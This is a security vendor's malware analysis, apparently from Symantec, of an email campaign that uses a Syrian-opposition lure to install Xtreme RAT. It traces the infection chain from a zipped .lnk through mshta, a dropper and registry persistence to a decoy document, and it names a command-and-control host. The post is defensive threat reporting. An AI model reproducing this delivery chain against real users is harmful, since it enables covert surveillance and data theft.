W32.Extrat: Syrian Conflict Used To Deliver Xtreme RAT
Contributor: Jeet Morparia
As conflict in Syria continues, email attacks against various organizations throughout the Middle East and Europe have also been identified.
Figure 1. Sample email used in this campaign from “Free Dom” (Freedom)
The targeted organizations are extensive, from individuals at a public university, to hotels, oil companies, and government agencies.
Recipients of these emails are presented with text in Arabic. The email (Figure 1) claims to be an important message from Sheikh Adnan al-Aroor, a figure in opposition to the current Syrian government. The email includes a .zip file attachment, which contains a .lnk (shortcut) file.
Figure 2. Properties of .lnk file used in this campaign
The .lnk file (detected as Downloader) contains a reference to MSHTA.exe, the Microsoft HTML Application Host file. The target of the .lnk file is passed an argument that points to an HTML file hosted on a malicious website.
The HTML file contains a combination of Visual Basic scripting as well as an embedded executable. The script is responsible for dropping the 1.exe file onto the compromised computer and executing it. This file is an executable compiled with an AutoIt script.
Once this file is executed, it copies itself to a temporary folder on the computer as a svhost.exe file. It also creates the following files in a specified temporary folder:
Figure 3. Document file used as smoke screen
The threat then creates registry entries so that it executes every time Windows starts. It also drops an araor.doc file (Figure 3) in the %Temp% folder and opens it. This file contains text that ties into the original lure: a message from Sheikh Adnan al-Aroor. This is a smoke screen to give the campaign an air of legitimacy. In actuality, the user is now infected with Xtreme RAT, which Symantec detects as W32.Extrat.
Xtreme RAT is a Remote Administration Tool (RAT) that allows a remote user to monitor keystrokes and steal information from the compromised computer. In this particular sample, we observed outbound connectivity to tn5.linkpc.net on port 82.
Figure 4. Another smoke screen from a similar campaign
Presently there are other campaigns attempting to spread W32.Extrat, including one that was virtually the same—just using a different lure. In the preceding Figure 4, you can see the smoke screen document used in that particular campaign.
This is not the first time that we have seen malware used during a time of conflict in the Middle East and it will not likely be the last.